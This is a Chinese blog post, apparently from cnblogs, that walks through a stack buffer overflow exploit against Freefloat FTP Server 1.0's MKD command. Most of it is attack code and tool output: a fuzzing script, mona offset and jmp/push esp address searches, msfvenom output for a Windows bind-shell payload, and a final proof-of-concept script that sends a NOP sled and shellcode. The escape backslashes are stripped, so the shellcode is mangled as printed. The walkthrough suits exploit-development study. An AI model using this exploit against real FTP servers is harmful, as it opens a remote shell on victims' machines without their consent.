zoukankan html css js c++ java

Freefloat FTP Server 1.0漏洞分析

溢出过程

运行溢出代码

#!/usr/bin/python
import socket
import sys
evil = "A"*1000
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('127.0.0.1',21))
s.recv(1024)
s.send('USER anonymous
')
s.recv(1024)
s.send('PASS anonymous
')
s.recv(1024)
s.send('MKD ' + evil + '
')
s.recv(1024)
s.send('QUIT
')
s.close

可以看到ESP与EIP都被A字符填充

接着我们利用create_pattern这个工具来生成1000的随机字符来代替前面的'A'

msfconsole
msf>/opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 1000

利用mona可以看到EIP的偏移量为247

试一下A*247+B*4+C*749

42即是B，将B替换成我们需要执行的命令的地址即可做到任意代码执行

利用mona查找找到几个地址，一部分在jmp.txt文件中，选出一个push esp地址0x77c21025

0x7d5a313b : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a314f : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a3163 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a318b : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a319f : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a31b3 : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a31c7 : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a31db : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a31ef : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a3203 : jmp esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d5a3217 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d70fa1e : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d718eed : jmp esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x77e6560a : jmp esp |  {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32RPCRT4.dll)
0x77e7025b : jmp esp |  {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32RPCRT4.dll)
0x771a36f8 : jmp esp |  {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:WINDOWSWinSxSx86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83comctl32.dll)
0x746b1873 : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32MSCTF.dll)
0x77f11d2f : jmp esp |  {PAGE_EXECUTE_READ} [GDI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32GDI32.dll)
0x77dbf049 : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x77dc965b : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x77de8063 : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x77df3b63 : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x77e12a9f : jmp esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x7c8369f0 : call esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32kernel32.dll)
0x7c868667 : call esp |  {PAGE_EXECUTE_READ} [kernel32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32kernel32.dll)
0x7c934663 : call esp |  {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32
tdll.dll)
0x7c97311b : call esp |  {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32
tdll.dll)
0x769b6cca : call esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ole32.dll)
0x769f9622 : call esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ole32.dll)
0x76a1e37b : call esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ole32.dll)
0x76a3120b : call esp |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ole32.dll)
0x77d537f8 : call esp |  {PAGE_EXECUTE_READ} [USER32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32USER32.dll)
0x7d5a30e3 : call esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d637ed3 : call esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d67f81b : call esp |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d6a0672 : call esp | ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x7d71183c : call esp | asciiprint,ascii {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x746bd20f : call esp |  {PAGE_EXECUTE_READ} [MSCTF.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32MSCTF.dll)
0x719e8d3f : call esp |  {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32mswsock.dll)
0x77dbeffc : call esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x77dbf0b2 : call esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x77de8153 : call esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x77dec23b : call esp |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x71a2f8fb : call esp |  {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32WS2_32.dll)
0x77c21025 : push esp # ret  |  {PAGE_EXECUTE_READ} [msvcrt.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v7.0.2600.5512 (C:WINDOWSsystem32msvcrt.dll)
0x7c939db0 : push esp # ret  |  {PAGE_EXECUTE_READ} [ntdll.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32
tdll.dll)
0x769a1594 : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ole32.dll)
0x769a3624 : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ole32.dll)
0x769e0b4e : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ole32.dll)
0x76a8dd4e : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ole32.dll)
0x76ab3995 : push esp # ret  |  {PAGE_EXECUTE_READ} [ole32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ole32.dll)
0x77f4c62b : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHLWAPI.dll)
0x77f4c77f : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHLWAPI.dll)
0x77f54ba3 : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHLWAPI.dll)
0x77f61d86 : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHLWAPI.dll)
0x77f61e8c : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHLWAPI.dll)
0x77f8d3a8 : push esp # ret  |  {PAGE_EXECUTE_READ} [SHLWAPI.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHLWAPI.dll)
0x5add6aeb : push esp # ret  |  {PAGE_EXECUTE_READ} [uxtheme.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32uxtheme.dll)
0x7d5b56ad : push esp # ret  |  {PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:WINDOWSsystem32SHELL32.dll)
0x77e96955 : push esp # ret  |  {PAGE_EXECUTE_READ} [RPCRT4.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32RPCRT4.dll)
0x77183be9 : push esp # ret  |  {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:WINDOWSWinSxSx86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83comctl32.dll)
0x771ac390 : push esp # ret  |  {PAGE_EXECUTE_READ} [comctl32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.0 (C:WINDOWSWinSxSx86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83comctl32.dll)
0x7364e436 : push esp # ret  |  {PAGE_EXECUTE_READ} [msctfime.ime] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32msctfime.ime)
0x719d51a5 : push esp # ret  |  {PAGE_EXECUTE_READ} [mswsock.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32mswsock.dll)
0x77da1758 : push esp # ret  |  {PAGE_EXECUTE_READ} [ADVAPI32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32ADVAPI32.dll)
0x71a22b53 : push esp # ret  |  {PAGE_EXECUTE_READ} [WS2_32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v5.1.2600.5512 (C:WINDOWSsystem32WS2_32.dll)

因为CPU为小端，此时可以将B*4替换成x25x10xc2x77

生成shellcode

root@ubuntu:/home/vincebye# msfvenom -p windows/shell_bind_tcp LPORT=5555 -f c -b 'x00x0ax0d' 
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 355 (iteration=0)
x86/shikata_ga_nai chosen with final size 355
Payload size: 355 bytes
Final size of c file: 1516 bytes
unsigned char buf[] = 
"xdaxd3xb8x30xaexb1x19xd9x74x24xf4x5ex2bxc9xb1"
"x53x83xeexfcx31x46x13x03x76xbdx53xecx8ax29x11"
"x0fx72xaax76x99x97x9bxb6xfdxdcx8cx06x75xb0x20"
"xecxdbx20xb2x80xf3x47x73x2ex22x66x84x03x16xe9"
"x06x5ex4bxc9x37x91x9ex08x7fxccx53x58x28x9axc6"
"x4cx5dxd6xdaxe7x2dxf6x5ax14xe5xf9x4bx8bx7dxa0"
"x4bx2ax51xd8xc5x34xb6xe5x9cxcfx0cx91x1ex19x5d"
"x5ax8cx64x51xa9xccxa1x56x52xbbxdbxa4xefxbcx18"
"xd6x2bx48xbax70xbfxeax66x80x6cx6cxedx8exd9xfa"
"xa9x92xdcx2fxc2xafx55xcex04x26x2dxf5x80x62xf5"
"x94x91xcex58xa8xc1xb0x05x0cx8ax5dx51x3dxd1x09"
"x96x0cxe9xc9xb0x07x9axfbx1fxbcx34xb0xe8x1axc3"
"xb7xc2xdbx5bx46xedx1bx72x8dxb9x4bxecx24xc2x07"
"xecxc9x17xbdxe4x6cxc8xa0x09xcexb8x64xa1xa7xd2"
"x6ax9exd8xdcxa0xb7x71x21x4bxa2x32xacxadxa6x24"
"xf9x66x5ex87xdexbexf9xf8x34x97x6dxb0x5ex20x92"
"x41x75x06x04xcax9ax92x35xcdxb6xb2x22x5ax4cx53"
"x01xfax51x7exf1x9fxc0xe5x01xe9xf8xb1x56xbexcf"
"xcbx32x52x69x62x20xafxefx4dxe0x74xccx50xe9xf9"
"x68x77xf9xc7x71x33xadx97x27xedx1bx5ex9ex5fxf5"
"x08x4dx36x91xcdxbdx89xe7xd1xebx7fx07x63x42xc6"
"x38x4cx02xcex41xb0xb2x31x98x70xc2x7bx80xd1x4b"
"x22x51x60x16xd5x8cxa7x2fx56x24x58xd4x46x4dx5d"
"x90xc0xbex2fx89xa4xc0x9cxaaxec";

最终版本的POC

#!/usr/bin/python
shellcode = (
"xdaxd3xb8x30xaexb1x19xd9x74x24xf4x5ex2bxc9xb1"
"x53x83xeexfcx31x46x13x03x76xbdx53xecx8ax29x11"
"x0fx72xaax76x99x97x9bxb6xfdxdcx8cx06x75xb0x20"
"xecxdbx20xb2x80xf3x47x73x2ex22x66x84x03x16xe9"
"x06x5ex4bxc9x37x91x9ex08x7fxccx53x58x28x9axc6"
"x4cx5dxd6xdaxe7x2dxf6x5ax14xe5xf9x4bx8bx7dxa0"
"x4bx2ax51xd8xc5x34xb6xe5x9cxcfx0cx91x1ex19x5d"
"x5ax8cx64x51xa9xccxa1x56x52xbbxdbxa4xefxbcx18"
"xd6x2bx48xbax70xbfxeax66x80x6cx6cxedx8exd9xfa"
"xa9x92xdcx2fxc2xafx55xcex04x26x2dxf5x80x62xf5"
"x94x91xcex58xa8xc1xb0x05x0cx8ax5dx51x3dxd1x09"
"x96x0cxe9xc9xb0x07x9axfbx1fxbcx34xb0xe8x1axc3"
"xb7xc2xdbx5bx46xedx1bx72x8dxb9x4bxecx24xc2x07"
"xecxc9x17xbdxe4x6cxc8xa0x09xcexb8x64xa1xa7xd2"
"x6ax9exd8xdcxa0xb7x71x21x4bxa2x32xacxadxa6x24"
"xf9x66x5ex87xdexbexf9xf8x34x97x6dxb0x5ex20x92"
"x41x75x06x04xcax9ax92x35xcdxb6xb2x22x5ax4cx53"
"x01xfax51x7exf1x9fxc0xe5x01xe9xf8xb1x56xbexcf"
"xcbx32x52x69x62x20xafxefx4dxe0x74xccx50xe9xf9"
"x68x77xf9xc7x71x33xadx97x27xedx1bx5ex9ex5fxf5"
"x08x4dx36x91xcdxbdx89xe7xd1xebx7fx07x63x42xc6"
"x38x4cx02xcex41xb0xb2x31x98x70xc2x7bx80xd1x4b"
"x22x51x60x16xd5x8cxa7x2fx56x24x58xd4x46x4dx5d"
"x90xc0xbex2fx89xa4xc0x9cxaaxec"
)
buffer = "x90"*20 + shellcode
#77c21025
#0x7c939db0
evil = "A"*247 + "xb0x9dx93x7c" + buffer + "C"*(749-len(buffer))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('127.0.0.1',21))
s.recv(1024)
s.send('USER anonymous
')
s.recv(1024)
s.send('PASS anonymous
')
s.recv(1024)
s.send('MKD ' + evil + '
')
s.recv(1024)
s.send('QUIT
')
s.close

注意事项

打开FTP->imdbg/attach->poc.py->F9(run) 有时FPU中不显示数据，关闭软件重开即可
CPU为小端
python版本shellcode打开了端口但是无法连接shell
调试过程中程序崩溃，不要点击不发送等按钮使其关闭

附

Mona

使用手册

https://bbs.pediy.com/thread-198185.htm

!mona

findmsp / findmsf | 在内存中查找循环模式

jmp / j | Find pointers that will allow you to jump to a register

与Immunity Debugger

放进PyCommands文件夹

查看全文

相关阅读:
quartz 之misfire
quartz 之job
quartz 日志观察
 quartz集群原理2
netty 之 GlobalEventExecutor
redis 修改配置文件不起作用？
Qto_MemberBaseQuantities
Qto_PlateBaseQuantities
Pset_BuildingElementProxyCommon
matlab绘制函数（观察凹凸性）

原文地址：https://www.cnblogs.com/vincebye/p/12820754.html